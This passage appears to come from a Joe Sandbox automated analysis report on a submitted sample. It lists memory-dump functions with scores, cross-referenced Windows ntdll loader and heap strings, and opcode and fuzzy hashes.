                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0D74
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: b559333a1dea25ab8191fa6402e3d17339ee28371f963f672f9c3d3a5b72afd7
                                                              • Instruction ID: 22c50a8273f21e7c87f0fd9320a1ed1eec7ca39c35bc89d54a269fe7c02b6c33
                                                              • Opcode Fuzzy Hash: b559333a1dea25ab8191fa6402e3d17339ee28371f963f672f9c3d3a5b72afd7
                                                              • Instruction Fuzzy Hash: E2426E71900715DFDB25CF28C880BAAB7F5FF48314F1445A9E99ADB242E770AA84CF61
                                                              Function 0119A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: a386563333b04f83d7cb56bc18f31fe9eb01dde9840f39255dd7a914310ded01
                                                              • Instruction ID: e0ec8329bfb497a4c53050e033a55a79a396dfcaf8ea882ea82f69443509182f
                                                              • Opcode Fuzzy Hash: a386563333b04f83d7cb56bc18f31fe9eb01dde9840f39255dd7a914310ded01
                                                              • Instruction Fuzzy Hash: B0C19C74208382CFDB19CF58D044B6AB7E4BF85704F05886DFAA58B251E734D949CB53
                                                              Function 011C8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 011C8591
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011C8421
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011C855E
                                                              • LdrpInitializeProcess, xrefs: 011C8422
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: d24509ca8cf30e723dad2a0d3ba904a9214cc1e6da94c99869f3aa85c19d608e
                                                              • Instruction ID: 3e2fbaba3898e949943b80c6791be91b1ada4810f49665882bd2d284eed1facf
                                                              • Opcode Fuzzy Hash: d24509ca8cf30e723dad2a0d3ba904a9214cc1e6da94c99869f3aa85c19d608e
                                                              • Instruction Fuzzy Hash: FF918E71558345AFD72ADF25CC81FABBAECBFA4A44F40092EFA8492151E374D904CB62
                                                              Function 011C273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • .Local, xrefs: 011C28D8
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012022B6
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012021D9, 012022B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 012021DE
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: c24097188001aa723fba4ca367907d7716b82351aa22de61d079a99b488a42a6
                                                              • Instruction ID: b004554b0ae06bc2a7f2b6074c0f48b535571678b75cc55ae475b65fe20e794b
                                                              • Opcode Fuzzy Hash: c24097188001aa723fba4ca367907d7716b82351aa22de61d079a99b488a42a6
                                                              • Instruction Fuzzy Hash: DBA1923590022ADFDB29CF58C888BA9B7B5BF68754F1541EED908A7251E7309E80CF91
                                                              Function 011C4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0120342A
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01203437
                                                              • RtlDeactivateActivationContext, xrefs: 01203425, 01203432, 01203451
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01203456
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 15ca47faa161831523615745c0e3f4fe4655038f7bd50134177b43ed5873bacf
                                                              • Instruction ID: 42666b028487de26b13d83da593764e2dc7405523857b07be9c6fe68e8d9427f
                                                              • Opcode Fuzzy Hash: 15ca47faa161831523615745c0e3f4fe4655038f7bd50134177b43ed5873bacf
                                                              • Instruction Fuzzy Hash: D4612236624A129FD72BCF1CC891B2AB7E1FFA0B10F16861DE9559F681C730E801CB95
                                                              Function 011964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011F0FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011F10AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011F106B
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011F1028
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: 0a73c3f93af435ae644fa5949a95c8a84afe9a7582690c53df3556dda9526bfe
                                                              • Instruction ID: d5c98355df304e6b7012bb99aff8c7296b4fb3554ceb4ea80b14a1c0921d005d
                                                              • Opcode Fuzzy Hash: 0a73c3f93af435ae644fa5949a95c8a84afe9a7582690c53df3556dda9526bfe
                                                              • Instruction Fuzzy Hash: C271E2B19043059FDB25DF18C884B9B7FA9EF557A8F404468F9588B186D334D588CFE2
                                                              Function 011C4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0120365C
                                                              • LdrpFindDllActivationContext, xrefs: 01203636, 01203662
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01203640, 0120366C
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0120362F
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: da9a9c774f12e16f17975b2569a74a031696fb219a3245d299cb5eec2acfbb64
                                                              • Instruction ID: 591997277e8d97a523789afd93f43c0d841cff9da6913bd8917181ff4b22b10c
                                                              • Opcode Fuzzy Hash: da9a9c774f12e16f17975b2569a74a031696fb219a3245d299cb5eec2acfbb64
                                                              • Instruction Fuzzy Hash: F2315C72908251AEEF3EFA0CD868B7D76A4BB31F14F06416DE90453A92DBA0DCC087D5
                                                              Function 011B245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011FA992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011FA9A2
                                                              • apphelp.dll, xrefs: 011B2462
                                                              • LdrpDynamicShimModule, xrefs: 011FA998
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: c5d369711fc9f2cda265b1a1814ec9c48b25bdf406646bc577de25a302032726
                                                              • Instruction ID: e6d533b7e2ef24d99eda9d6842e138d1287a9fc2fdf8db3b150678494a26e137
                                                              • Opcode Fuzzy Hash: c5d369711fc9f2cda265b1a1814ec9c48b25bdf406646bc577de25a302032726
                                                              • Instruction Fuzzy Hash: 4C314A75611201AFDB3DDF59F888EAE7BB4FF80B04F16002DEA046B245D774A885C780
                                                              Function 011A29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP: , xrefs: 011A3264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 011A327D
                                                              • HEAP[%wZ]: , xrefs: 011A3255
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: f6263a422f84b222f35c0290f9945b3dc4dec740d0f5fb7e0db4bfc906ae4471
                                                              • Instruction ID: 911e5ff7a00c996fe9a446051a5a54235c0a9da869e3f7cad60133f3ea6b483b
                                                              • Opcode Fuzzy Hash: f6263a422f84b222f35c0290f9945b3dc4dec740d0f5fb7e0db4bfc906ae4471
                                                              • Instruction Fuzzy Hash: DF92CD78A042499FDB29CFA8C444BAEBFF1FF08304F588059E959AB392D334A945CF50
                                                              Function 011A0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: 0e3d0139d87c98ea34341a5bb51542f954d4d1fca52a7ca9136b413eda549abf
                                                              • Instruction ID: e074a9e811cfd0dd25f08c972b8d8a72e49d77e697cb166a744d09783cd63075
                                                              • Opcode Fuzzy Hash: 0e3d0139d87c98ea34341a5bb51542f954d4d1fca52a7ca9136b413eda549abf
                                                              • Instruction Fuzzy Hash: 38F1B174A00606DFEB1DCF68C894B6ABBF6FF49304F548268E5169B351D730E981CB91
                                                              Function 011B6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: 0d7ff342565646f534b0edc6b876e05229972fb3a366798d014db00d60a08824
                                                              • Instruction ID: 9c97967a5837ac738cc18bdcde57860df0b5455b7e80512dfdd0dda0f1e2a2c6
                                                              • Opcode Fuzzy Hash: 0d7ff342565646f534b0edc6b876e05229972fb3a366798d014db00d60a08824
                                                              • Instruction Fuzzy Hash: 00C27F716087459FD729CF28C881BABBBE5AFC8754F05892DFA89C7281D734D805CB92
                                                              Function 0118A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: e48d4f00966fda91586ebb4aad7341ae2537fcda3df2df2aa68a2f742315d8e6
                                                              • Instruction ID: b7c28d1fc994e9a35865a004d4dbf3d0698cd4e5a589c3eaf5dfc5f50b135453
                                                              • Opcode Fuzzy Hash: e48d4f00966fda91586ebb4aad7341ae2537fcda3df2df2aa68a2f742315d8e6
                                                              • Instruction Fuzzy Hash: 94A17F719116299BDB35DF68CC88BEEB7B9EF44704F1041EAD908A7250D7359E84CF90
                                                              Function 011B0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 011FA10F
                                                              • LdrpCheckModule, xrefs: 011FA117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011FA121
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 862c311dee56551636d11216fbcbcdfc74f479457760e5c61defc5878a29e125
                                                              • Instruction ID: 8a21cc01b1319ceb59f9e8cc479adffc282d12e2a1e20ce04801121e2aee5070
                                                              • Opcode Fuzzy Hash: 862c311dee56551636d11216fbcbcdfc74f479457760e5c61defc5878a29e125
                                                              • Instruction Fuzzy Hash: 5071CF70A002059FDB2DEF68E984ABEB7F4FF48704F15406DE906EB651E734A982CB51
                                                              Function 011A0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 8fa6af48cd74212ba5fa28ca33e2be72b08f2a8eed3155081dc8884f4dcfaee8
                                                              • Instruction ID: 11125276f0fa0cad81d0a98f33693dde3d8c1e52dc8bb10302875bf1e14d2655
                                                              • Opcode Fuzzy Hash: 8fa6af48cd74212ba5fa28ca33e2be72b08f2a8eed3155081dc8884f4dcfaee8
                                                              • Instruction Fuzzy Hash: 7761CD786043019FDB2DCF28C580B6ABFE2FF49304F55855DE95A8B292D770E881CB91
                                                              Function 011CC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 012082E8
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 012082DE
                                                              • Failed to reallocate the system dirs string !, xrefs: 012082D7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: aae641f8685457267a3b8f9d447746877f552042071b42fbd3ac3a3daf82edc2
                                                              • Instruction ID: fb07043650b074ac571ff658246fa1b1a86d2e91d81167671d6387fe33ffcf30
                                                              • Opcode Fuzzy Hash: aae641f8685457267a3b8f9d447746877f552042071b42fbd3ac3a3daf82edc2
                                                              • Instruction Fuzzy Hash: AE412371511311AFC729EB68E848B5F7BE8EFA4A14F00492EF948D7291E734D800CB92
                                                              Function 0124C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 0124C1F1
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0124C1C5
                                                              • PreferredUILanguages, xrefs: 0124C212
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: 3e3ddf13f1f63b22e16435b3a4b1ce1b008cbb792c9d1e6a8ceb4f60066c6e7e
                                                              • Instruction ID: 4f3316b897d9d50a39aab827c24fb7aaf849ce1502395ab44a648110f6a361d8
                                                              • Opcode Fuzzy Hash: 3e3ddf13f1f63b22e16435b3a4b1ce1b008cbb792c9d1e6a8ceb4f60066c6e7e
                                                              • Instruction Fuzzy Hash: 91418371E1120AEBDF19DEEDC841FEEBBB9AB14704F10406AE609B7240E7B49A44CB50
                                                              Function 01224144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: 3ad1ef43f1a39ff598c34538bb796da80bf9175e9dca84ebc042d30c4d073f94
                                                              • Instruction ID: c9d2db531bc890a087ea7e5102b33696492f6d437b9e34aaab7883167a7248d5
                                                              • Opcode Fuzzy Hash: 3ad1ef43f1a39ff598c34538bb796da80bf9175e9dca84ebc042d30c4d073f94
                                                              • Instruction Fuzzy Hash: 10413A31A203A9DBEB26EBD9C844BADBBF4FF56344F24055ADA11EB381D7748901CB50
                                                              Function 01214755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01214899
                                                              • LdrpCheckRedirection, xrefs: 0121488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01214888
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: f6bebc3517d16e8856c385f7881597b8bc10080df696bf5fe92abcc64719867d
                                                              • Instruction ID: 3ff21f017a7e9a2364928d38513fd0147fc6e41de6d15b4c620fa9b95df9d281
                                                              • Opcode Fuzzy Hash: f6bebc3517d16e8856c385f7881597b8bc10080df696bf5fe92abcc64719867d
                                                              • Instruction Fuzzy Hash: 8941E472A342928FCB26EE1CD840A267BE4EF69B50F0A056DEE4DD7359D331D801CB81
                                                              Function 011A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: d5493f5cd66461dc984e9df0b88345233f470fee41837a37030ebed430fae617
                                                              • Instruction ID: 1cab614a2e7d19795a3bcfacd1bc8edca85431624a09c988cae537ce2d42504c
                                                              • Opcode Fuzzy Hash: d5493f5cd66461dc984e9df0b88345233f470fee41837a37030ebed430fae617
                                                              • Instruction Fuzzy Hash: 07113334315102CFDB6DDE18D480B7ABBA6EF4061AF19815DF506CB251EB30DC40CB56
                                                              Function 012120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 012120FA
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01212104
                                                              • Process initialization failed with status 0x%08lx, xrefs: 012120F3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: fc3355fcf930283005df41efbc0cc370185b9cd817f2085cd416e25e0218a9d4
                                                              • Instruction ID: df91a23e9e3b92da845c43e6d84f9cb3b6a2b052303962d3bccaf79a5c1205e2
                                                              • Opcode Fuzzy Hash: fc3355fcf930283005df41efbc0cc370185b9cd817f2085cd416e25e0218a9d4
                                                              • Instruction Fuzzy Hash: EDF02234650309BFE728E60CEC46FA93BA8FB50B04F200058FB007768AE2B0E941C680
                                                              Function 011A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: 46c5451080f783fe5b9892a716d84d27e0ed857291b0a0c4926dca3efd829b1a
                                                              • Instruction ID: bf43d8ec08414aeeaf95c8039265fb02bd85e83e6ac492c338539eea2aaf136a
                                                              • Opcode Fuzzy Hash: 46c5451080f783fe5b9892a716d84d27e0ed857291b0a0c4926dca3efd829b1a
                                                              • Instruction Fuzzy Hash: E6715D71A0014A9FDB09DF98C994BAEBBF8FF18304F154069E905E7251E734ED41CBA1
                                                              Function 0119A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Enter, xrefs: 0119AA13
                                                              • LdrResSearchResource Exit, xrefs: 0119AA25
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 87a1352e65d1e086faaa5b521dd62ddd557b0542ccb4727f8f20e34bed3db84e
                                                              • Instruction ID: 615365540f5600df231f96a5596f427278483e526c09af5131d74ab76dbdf9ba
                                                              • Opcode Fuzzy Hash: 87a1352e65d1e086faaa5b521dd62ddd557b0542ccb4727f8f20e34bed3db84e
                                                              • Instruction Fuzzy Hash: DAE18071E14219AFEF2ECE98D980BAEBBB9BF04314F15442AEA21E7241D734D944CB51
                                                              Function 0125A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: d56be4b7850ab0bee886dbbf97212b55a48c2e0a32f55206f46ecddc248753ea
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 2EC1B0312243469FEB65CF28C882B6BBBE5AFD4318F044A2DFA968B290D774D505CB51
                                                              Function 0120E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: a15c89e7d57337b388f67dff3663b4d11acf55be8a62b955e1cdea701930948f
                                                              • Instruction ID: fd1fc9bcba7d593335f861cd793fac4dd2e54c5e2958c197173c8c127214a384
                                                              • Opcode Fuzzy Hash: a15c89e7d57337b388f67dff3663b4d11acf55be8a62b955e1cdea701930948f
                                                              • Instruction Fuzzy Hash: 93619271E103199FDB19DFA8C840BADBBB9FF44704F15452DE649EB2A2D731A940CB50
                                                              Function 012343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 54c50ca0b5e2365648e6ac53e63382811cadbcacf4bbe038ed9eda4005d4ac3f
                                                              • Instruction ID: c06343ac372c77543ad1ac51d4967ad9806082d13a377c6008621d5d83b69269
                                                              • Opcode Fuzzy Hash: 54c50ca0b5e2365648e6ac53e63382811cadbcacf4bbe038ed9eda4005d4ac3f
